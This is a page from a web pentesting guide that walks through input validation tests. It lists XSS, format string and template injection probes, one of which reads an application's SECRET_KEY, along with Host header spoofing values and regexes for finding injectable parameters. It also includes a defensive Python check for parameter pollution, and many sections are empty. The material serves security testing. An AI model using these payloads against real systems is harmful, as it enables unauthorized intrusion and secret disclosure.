The Pentesting Guide

4.7 Input Validation Testing

Last updated 5 months ago

4.7.1 Testing for Reflected Cross Site Scripting

(?:\?|&)(\w+)=
"><img src=1 onerror=alert(1)>
<script>alert(2)</script>"<

Evidence:

4.7.2 Testing for Stored Cross Site Scripting

You can use the previous payloads.

Evidence:

4.7.3 Testing for HTTP Verb Tampering

This section has been merged into: Test HTTP Methods.

Evidence:

4.7.4 Testing for HTTP Parameter Pollution

The expected result is that the application takes both parameters instead of only one of them.
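
As an added example (not from the original page), a small Python check for this test case: it parses a query string keeping every occurrence of each parameter, reports which ones are duplicated, models how a back end that keeps the first, the last or all values would read the same request, and rejects polluted requests outright, which is the fix a defender would put in front of a sensitive endpoint. The sample query strings are constructed.

```python
from urllib.parse import parse_qsl

# Constructed sample query strings for this example (not from the page).
CLEAN_QUERY = "id=5&lang=en"
POLLUTED_QUERY = "id=5&id=7&lang=en"


def parse_query(qs: str) -> dict[str, list[str]]:
    """Parse a query string, keeping every occurrence of each parameter
    in the order it appeared instead of silently collapsing duplicates."""
    params: dict[str, list[str]] = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        params.setdefault(key, []).append(value)
    return params


def polluted_params(qs: str) -> list[str]:
    """Names of parameters supplied more than once: the HPP indicator."""
    return sorted(k for k, v in parse_query(qs).items() if len(v) > 1)


def resolve(qs: str, policy: str) -> dict[str, str]:
    """Model how a back end that keeps the first, the last, or all values
    of a duplicated parameter would interpret the same request. Test 4.7.4
    is about finding out which of these the target actually does."""
    resolved: dict[str, str] = {}
    for key, values in parse_query(qs).items():
        if policy == "first":
            resolved[key] = values[0]
        elif policy == "last":
            resolved[key] = values[-1]
        elif policy == "all":
            resolved[key] = ",".join(values)
        else:
            raise ValueError(f"unknown policy: {policy}")
    return resolved


def check_request(qs: str) -> tuple[int, str]:
    """Defensive handling: refuse any request that repeats a parameter so
    that the front end, a WAF and the back end can never disagree on it."""
    dupes = polluted_params(qs)
    if dupes:
        return 400, "duplicate parameter(s): " + ", ".join(dupes)
    return 200, "ok"


if __name__ == "__main__":
    for policy in ("first", "last", "all"):
        print(policy, resolve(POLLUTED_QUERY, policy))
    print(check_request(CLEAN_QUERY), check_request(POLLUTED_QUERY))
```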

Evidence:

4.7.5 Testing for SQL Injection

SQL wordlist & NoSQL Payloads.

Evidence:

4.7.6 Testing for LDAP Injection

LDAP Wordlist.

Evidence:

4.7.7 Testing for XML Injection

Try to exploit XXE vulnerabilities.

Evidence:

4.7.8 Testing for SSI Injection

Evidence:

4.7.9 Testing for XPath Injection

Evidence:

4.7.10 Testing for IMAP SMTP Injection

Evidence:

4.7.11 Testing for Code Injection

[?&](file|filepath|filename|dir|folder|download|upload|doc|image|path|include|view|resource|asset|content|icon|logfile)=
  • Website/URL Access Parameters

[?&](url|link|redirect|target|site|page|navigate|ref|callback|host|return|next)=
  • UNIX FI & Windows FI

Evidence:

4.7.12 Testing for Command Injection

[?&](cmd|exec|action|run|query|operation|execute|task|process|shell|module|method|command|do)=

Windows RCE & UNIX RCE.

Evidence:

4.7.13 Testing for Format String Injection

alice
%s%s%s%n
%p%p%p%p%p
{event.__init__.__globals__[CONFIG][SECRET_KEY]}

Evidence:

4.7.14 Testing for Incubated Vulnerability

Evidence:

4.7.15 Testing for HTTP Splitting Smuggling

CL.TE, TE.CL, TE.TE.

Evidence:

4.7.16 Testing for HTTP Incoming Requests

Evidence:

4.7.17 Testing for Host Header Injection

Modify the value of the Host header in different endpoints on the application.

X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-IP: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Host: 127.0.0.1
X-HTTP-Host-Override: 127.0.0.1
X-Client: 127.0.0.1

Evidence:

4.7.18 Testing for Server-side Template Injection

a{{7*7}}b
a{{7*7}}
{7*7}
${7*7}
{{7*7}}
<% 7*7 %>
[% 7*7 %]

Evidence:

4.7.19 Testing for Server-Side Request Forgery

Evidence:
